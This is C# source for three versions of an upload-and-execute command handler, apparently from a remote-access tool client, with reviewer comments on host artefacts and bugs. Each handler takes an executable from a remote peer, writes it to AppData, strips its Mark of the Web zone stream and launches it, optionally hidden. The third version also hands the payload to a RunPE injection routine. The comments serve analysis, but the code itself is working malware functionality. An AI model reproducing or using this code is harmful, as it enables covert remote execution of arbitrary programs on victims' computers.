/// <summary>
/// Handles one block of a chunked "upload and execute" command from the remote peer:
/// appends the block to a file under the user's roaming application-data folder and,
/// once the last block has arrived, starts that file as a new process.
/// </summary>
/// <param name="command">Packet carrying the block data, block index, total block count, target file name and the RunHidden flag.</param>
/// <param name="client">Connection that the status replies are sent on.</param>
/// <remarks>
/// Host artefacts visible in this code: a file written under the ApplicationData special folder,
/// deletion of that file's ":Zone.Identifier" alternate data stream, and a child process started
/// from that path (optionally with a hidden window). The status literals sent back
/// ("Executed File!", "Writing failed: ...", "Execution failed: ...") are fixed strings in the client.
/// </remarks>
public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client)
{
    // NOTE(review): command.FileName is used without validation. Path.Combine returns its second
    // argument unchanged when that argument is rooted and does not remove ".." segments, so the
    // final location is whatever the sender supplies and is not guaranteed to be inside AppData.
    string filePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), command.FileName);
    try
    {
        // Header check on the first block only. NOTE(review): the two byte comparisons are joined
        // with a logical AND, so the exception is raised only when BOTH bytes differ from "MZ";
        // a block whose first byte is 'M' or whose second byte is 'Z' passes. Do not read this as
        // real PE validation. A block shorter than two bytes presumably faults on the indexer and
        // lands in the catch below - confirm the type of Block.
        if (command.CurrentBlock == 0 && command.Block[0] != 'M' && command.Block[1] != 'Z')
        {
            throw new Exception("No executable file");
        }
        // FileSplit is defined elsewhere; here it is only asked to append this block at its index.
        FileSplit destFile = new FileSplit(filePath);
        if (!destFile.AppendBlock(command.Block, command.CurrentBlock))
        {
            // Write failure is reported to the peer. This path returns without calling DeleteFile,
            // so anything already written to filePath is left on disk.
            new Packets.ClientPackets.Status(string.Format("Writing failed: {0}", destFile.LastError)).Execute( client);
            return;
        }
        if ((command.CurrentBlock + 1) == command.MaxBlocks) // last block received: execute
        {
            // Removes the Zone.Identifier alternate data stream (the "Mark of the Web" zone tag)
            // before launch. DeleteFile is defined elsewhere - presumably a plain file delete; confirm.
            DeleteFile(filePath + ":Zone.Identifier");
            ProcessStartInfo startInfo = new ProcessStartInfo();
            if (command.RunHidden)
            {
                startInfo.WindowStyle = ProcessWindowStyle.Hidden;
                startInfo.CreateNoWindow = true;
            }
            // UseShellExecute mirrors RunHidden. Per the .NET documentation CreateNoWindow is ignored
            // when UseShellExecute is true, so the hidden case relies on WindowStyle.
            startInfo.UseShellExecute = command.RunHidden;
            startInfo.FileName = filePath;
            Process.Start(startInfo);
            new Packets.ClientPackets.Status("Executed File!").Execute(client);
        }
    }
    catch (Exception ex)
    {
        // Any failure removes the target file and returns the exception message to the peer.
        DeleteFile(filePath);
        new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
    }
}
/// <summary>
/// Handles a single-packet "upload and execute" command from the remote peer: on a new thread,
/// writes the received bytes to a file under the user's roaming application-data folder and
/// starts that file as a new process.
/// </summary>
/// <param name="command">Packet carrying the whole file in FileBytes, the target file name and the RunHidden flag.</param>
/// <param name="client">Connection that the status replies are sent on.</param>
/// <remarks>
/// Host artefacts visible in this code: a file written under the ApplicationData special folder,
/// deletion of that file's ":Zone.Identifier" alternate data stream, and a child process started
/// from that path (optionally with a hidden window). The status literals "Executed File!" and
/// "Execution failed!" are fixed strings in the client.
/// </remarks>
public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client)
{
    // All work runs on a dedicated thread, so this handler returns to its caller immediately.
    new Thread(new ThreadStart(() =>
    {
        byte[] fileBytes = command.FileBytes;
        // NOTE(review): command.FileName is used without validation. Path.Combine returns its second
        // argument unchanged when that argument is rooted and does not remove ".." segments, so the
        // final location is whatever the sender supplies and is not guaranteed to be inside AppData.
        string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), command.FileName);
        try
        {
            // NOTE(review): the two byte comparisons are joined with a logical AND, so the exception
            // is raised only when BOTH bytes differ from "MZ"; this is not real PE validation.
            // A null or too-short array faults here and is handled by the catch below.
            if (fileBytes[0] != 'M' && fileBytes[1] != 'Z')
            {
                throw new Exception("no pe file");
            }
            // File.WriteAllBytes creates the file or overwrites an existing one at that path.
            File.WriteAllBytes(tempFile, fileBytes);
            // Removes the Zone.Identifier alternate data stream (the "Mark of the Web" zone tag)
            // before launch. DeleteFile is defined elsewhere - presumably a plain file delete; confirm.
            DeleteFile(tempFile + ":Zone.Identifier");
            ProcessStartInfo startInfo = new ProcessStartInfo();
            if (command.RunHidden)
            {
                startInfo.WindowStyle = ProcessWindowStyle.Hidden;
                startInfo.CreateNoWindow = true;
            }
            // UseShellExecute mirrors RunHidden. Per the .NET documentation CreateNoWindow is ignored
            // when UseShellExecute is true, so the hidden case relies on WindowStyle.
            startInfo.UseShellExecute = command.RunHidden;
            startInfo.FileName = tempFile;
            Process.Start(startInfo);
        }
        catch
        {
            // Untyped catch: every failure (bad header, write error, launch error) is collapsed into
            // the same reply, and the cause is neither logged nor returned. The target file is removed.
            DeleteFile(tempFile);
            new Packets.ClientPackets.Status("Execution failed!").Execute(client);
            return;
        }
        // Reached only when Process.Start returned without throwing.
        new Packets.ClientPackets.Status("Executed File!").Execute(client);
    })).Start();
}
/// <summary>
/// Handles one block of a chunked "upload and execute" command from the remote peer. Blocks are
/// collected through a MemorySplit object; once the last block has arrived, command.Type selects
/// what happens to the payload: "drop" writes it out and starts it as a process, while "self" and
/// "cmd" pass it Base64-encoded to RunPE.Invoke.
/// </summary>
/// <param name="command">Packet carrying the block data, block index, total block count, target file name, execution Type and the RunHidden flag.</param>
/// <param name="client">Connection that the status replies are sent on; also handed to RunPE.Invoke.</param>
/// <remarks>
/// Only the "drop" branch shows a Process.Start on a file path in this handler. For "self" and
/// "cmd" no file write or process start is visible here, so monitoring that relies on a dropped
/// file under AppData may not observe those branches - what RunPE.Invoke does must be checked in
/// its own source. The status literals ("Executed File!", "Drop failed: ...", "Payload was null!",
/// "Unknown Injection Type!", "Execution failed: ...") are fixed strings in the client.
/// </remarks>
public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client)
{
    // NOTE(review): command.FileName is used without validation. Path.Combine returns its second
    // argument unchanged when that argument is rooted and does not remove ".." segments, so the
    // final location is whatever the sender supplies and is not guaranteed to be inside AppData.
    string filePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), command.FileName);
    try
    {
        // Header check on the first block only. NOTE(review): the two byte comparisons are joined
        // with a logical AND, so the exception is raised only when BOTH bytes differ from "MZ";
        // this is not real PE validation. A block shorter than two bytes presumably faults on the
        // indexer and lands in the catch below - confirm the type of Block.
        if (command.CurrentBlock == 0 && command.Block[0] != 'M' && command.Block[1] != 'Z')
        {
            throw new Exception("No executable file");
        }
        // MemorySplit is defined elsewhere. NOTE(review): the name and the later DropFile() /
        // ToByteArray() calls suggest blocks are buffered in memory rather than written as they
        // arrive, but a new instance is created for every block - confirm how state is kept.
        MemorySplit destFile = new MemorySplit(filePath);
        if (!destFile.AppendBlock(command.Block, command.CurrentBlock))
        {
            new Packets.ClientPackets.Status(string.Format("Writing failed: {0}", destFile.LastError)).Execute( client);
            return;
        }
        if ((command.CurrentBlock + 1) == command.MaxBlocks) // last block received: execute
        {
            if (command.Type == "drop")
            {
                // Payload is materialised by DropFile() (presumably at filePath - confirm), then launched.
                if (!destFile.DropFile())
                {
                    new Packets.ClientPackets.Status(string.Format("Drop failed: {0}", destFile.LastError)).Execute( client);
                    return;
                }
                // Removes the Zone.Identifier alternate data stream (the "Mark of the Web" zone tag)
                // before launch. DeleteFile is defined elsewhere - presumably a plain file delete; confirm.
                DeleteFile(filePath + ":Zone.Identifier");
                ProcessStartInfo startInfo = new ProcessStartInfo();
                if (command.RunHidden)
                {
                    startInfo.WindowStyle = ProcessWindowStyle.Hidden;
                    startInfo.CreateNoWindow = true;
                }
                // UseShellExecute mirrors RunHidden. Per the .NET documentation CreateNoWindow is
                // ignored when UseShellExecute is true, so the hidden case relies on WindowStyle.
                startInfo.UseShellExecute = command.RunHidden;
                startInfo.FileName = filePath;
                Process.Start(startInfo);
                new Packets.ClientPackets.Status("Executed File!").Execute(client);
            }
            else if (command.Type == "self")
            {
                byte[] dat = destFile.ToByteArray();
                //File.WriteAllBytes("lol.exe", dat);
                if (dat == null)
                {
                    new Packets.ClientPackets.Status("Payload was null!").Execute(client);
                    return;
                }
                // Commented-out earlier call path, kept as the author left it:
                //Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib);
                //a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "self", "" } });
                // Payload goes to RunPE.Invoke as Base64 with the mode strings "self" and "".
                // RunPE is defined elsewhere; no success status is sent from this branch.
                RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "self", "" }, client);
            }
            else if (command.Type == "cmd")
            {
                byte[] dat = destFile.ToByteArray();
                if (dat == null)
                {
                    new Packets.ClientPackets.Status("Payload was null!").Execute(client);
                    return;
                }
                // Commented-out earlier call path, kept as the author left it:
                //Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib);
                //a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "sys", "cmd" } });
                // Same hand-off as the "self" branch, with the mode strings "sys" and "cmd".
                // NOTE(review): the meaning of these strings is defined by RunPE - confirm there.
                RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "sys", "cmd" }, client);
            }
            else
            {
                // Any other Type value is rejected and reported; nothing is executed.
                new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client);
            }
        }
    }
    catch (Exception ex)
    {
        // Any failure deletes filePath and returns the full exception text (ex.ToString(), which
        // includes the stack trace) to the peer.
        DeleteFile(filePath);
        new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.ToString())).Execute(client);
        //MessageBox.Show(ex.ToString());
    }
}